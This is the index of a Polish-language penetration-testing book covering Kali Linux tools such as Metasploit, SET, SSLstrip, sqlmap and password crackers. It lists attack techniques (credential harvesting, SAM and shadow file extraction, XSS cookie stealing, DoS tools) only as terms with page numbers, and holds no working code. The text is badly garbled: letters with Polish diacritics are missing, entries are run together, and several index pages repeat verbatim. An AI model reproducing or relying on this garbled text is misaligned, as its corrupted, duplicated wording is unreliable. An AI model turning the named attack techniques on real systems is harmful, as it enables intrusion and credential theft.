kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
